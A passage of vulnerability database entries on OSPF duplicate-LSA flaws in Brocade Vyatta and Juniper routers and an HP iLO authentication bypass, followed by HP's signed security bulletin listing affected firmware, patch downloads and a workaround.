The OSPF implementation on the Brocade Vyatta vRouter with software before 6.6R1 does not consider the possibility of duplicate Link State ID values in Link State Advertisement (LSA) packets before performing operations on the LSA database, which allows remote attackers to cause a denial of service (routing disruption) or obtain sensitive packet information via a crafted LSA packet, a related issue to CVE-2013-0149. The Open Shortest Path First (OSPF) protocol does not specify unique Link State Advertisement (LSA) lookup identifiers, which allows an attacker to intercept traffic or conduct a Denial of Service (DoS) attack. This vulnerability is related to CVE-2013-0149. Supplementary information: the CWE vulnerability type has been identified as CWE-694 (Use of Multiple Resources with Duplicate Identifier). Brocade Vyatta vRouter is a router device. Multiple Brocade routers are prone to a remote security-bypass vulnerability due to an error in the OSPF protocol specification. Exploiting this issue could allow an attacker to bypass certain security restrictions and take full control of the OSPF AS domain routing table, blackhole traffic, and intercept traffic. This may aid in further attacks. The security vulnerability is in the OSPF implementation of the Brocade Vyatta vRouter running software versions before 6.6R1
VAR-201401-0491 CVE-2013-7313 Open Shortest Path First (OSPF) Protocol does not specify unique LSA lookup identifiers CVSS V2: 5.4
CVSS V3: -
Severity: MEDIUM
The OSPF implementation in Juniper Junos through 13.x, JunosE, and ScreenOS through 6.3.x does not consider the possibility of duplicate Link State ID values in Link State Advertisement (LSA) packets before performing operations on the LSA database, which allows remote attackers to cause a denial of service (routing disruption) or obtain sensitive packet information via a crafted LSA packet, a related issue to CVE-2013-0149. The Open Shortest Path First (OSPF) protocol does not specify unique Link State Advertisement (LSA) lookup identifiers, which allows an attacker to intercept traffic or conduct a Denial of Service (DoS) attack. This vulnerability is related to CVE-2013-0149. Supplementary information: the CWE vulnerability type has been identified as CWE-694 (Use of Multiple Resources with Duplicate Identifier). Multiple Juniper Products are prone to a remote security-bypass vulnerability due to an error in the OSPF protocol specification. Exploiting this issue could allow an attacker to bypass certain security restrictions and take full control of the OSPF AS domain routing table, blackhole traffic, and intercept traffic. This may aid in further attacks. Juniper Junos, JunosE and ScreenOS are all operating systems of Juniper Networks. Junos is a network operating system dedicated to the company's hardware systems; JunosE is an operating system running on E-series IP edge and broadband service routers; ScreenOS is an operating system running on NetScreen series firewalls
VAR-201308-0273 CVE-2013-4805 HP Integrated Lights-Out 3 and HP Integrated Lights-Out 4 Vulnerabilities that can bypass authentication in some firmware CVSS V2: 9.0
CVSS V3: -
Severity: HIGH
Unspecified vulnerability in HP Integrated Lights-Out 3 (aka iLO3) firmware before 1.60 and 4 (aka iLO4) firmware before 1.30 allows remote attackers to bypass authentication via unknown vectors. HP Integrated Lights-Out 3 (alias iLO3) and HP Integrated Lights-Out 4 (alias iLO4) contain a vulnerability that allows authentication to be bypassed. Authentication may be bypassed by a third party. An attacker can exploit this issue to bypass the authentication mechanism and perform unauthorized actions on the affected computer. This may aid in further attacks. HP Integrated Lights-Out (iLO) is an embedded server management technology of Hewlett-Packard (HP), which uses an integrated remote management port to monitor and maintain the operating status of the server, and remotely manage and control the server.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Note: the current version of the following document is available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c03844348

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c03844348
Version: 2

HPSBMU02902 rev.2 - HP Integrated Lights-Out iLO3, iLO4, and iLO CM IPMI, Cipher Suite 0 Authentication Bypass Vulnerability

NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.

Release Date: 2013-07-16
Last Updated: 2013-08-19

Potential Security Impact: Authentication bypass

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
A potential security vulnerability has been identified with HP Integrated Lights-Out iLO3, iLO4, and iLO CM IPMI. The vulnerability could allow authentication bypass.

References: CVE-2013-4805 (SSRT101250)

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP Integrated Lights-Out 4 (iLO4) firmware versions prior to v1.30
HP Moonshot iLO Chassis Management Firmware (iLO CM) versions prior to v1.02

BACKGROUND

CVSS 2.0 Base Metrics
===========================================================
  Reference              Base Vector              Base Score
CVE-2013-4805    (AV:N/AC:L/Au:N/C:P/I:P/A:C)       9.0
===========================================================
Information on CVSS is documented in HP Customer Notice: HPSN-2008-002

RESOLUTION

HP has made the following firmware updates available to resolve the vulnerability.

HP Integrated Lights-Out 3 (iLO3) Online ROM Flash Component for Linux and Windows v1.60 or subsequent.
iLO3 1.61 for Windows: ftp://ftp.hp.com/pub/softlib2/software1/sc-windows-fw-ilo/p901462262/v89959
iLO3 1.61 for Windows x64: ftp://ftp.hp.com/pub/softlib2/software1/sc-windows-fw-ilo/p1728391553/v89958
iLO3 1.61 for Linux: ftp://ftp.hp.com/pub/softlib2/software1/sc-linux-fw-ilo/p1255562964/v89960
iLO3 1.61 for VMware ESXi: Extract the iLO firmware from the Windows or Linux component and flash the iLO directly, or use HP SUM.

HP Integrated Lights-Out 4 (iLO4) Online ROM Flash Component for Linux and Windows v1.30 or subsequent.
iLO4 1.30 for Windows: ftp://ftp.hp.com/pub/softlib2/software1/sc-windows-fw-ilo/p1267515540/v80805
iLO4 1.30 for Windows x64: ftp://ftp.hp.com/pub/softlib2/software1/sc-windows-fw-ilo/p1401725332/v80806
iLO4 1.30 for Linux: ftp://ftp.hp.com/pub/softlib2/software1/sc-linux-fw-ilo/p1950562118/v80804

iLO CM 1.02 for v1.5 MCP (Moonshot Component Pack)
ftp://ftp.hp.com/pub/softlib2/software1/supportpack-generic/p1423761203/v88991

NOTE: As an alternative to installing the patches, customers can disable IPMI over LAN in the iLO graphical user interface. Please refer to the appropriate version of the iLO user documentation for the product that you have.

HISTORY
Version:1 (rev.1) - 31 July 2013 Initial release
Version:2 (rev.2) - 20 August 2013 Added iLO CM, updated iLO3 to v1.61, changed VMware ESXi recommendation.

Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.

Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hp.com.

Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com

Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins

Security Bulletin Archive: A list of recently released Security Bulletins is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/

Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB.
3C = 3COM
3P = 3rd Party Software
GN = HP General Software
HF = HP Hardware and Firmware
MP = MPE/iX
MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PI = Printing and Imaging
PV = ProCurve
ST = Storage Software
TU = Tru64 UNIX
UX = HP-UX

Copyright 2013 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP nor its affiliates, subcontractors or suppliers will be liable for incidental, special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners.

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.13 (GNU/Linux)

iEYEARECAAYFAlISpnYACgkQ4B86/C0qfVmltwCffQ9b+IQKRvs2BpXalaKleksp
t1QAoOhhKFaiUSVUDeHnc7YLtNqUKIfG
=NI3P
-----END PGP SIGNATURE-----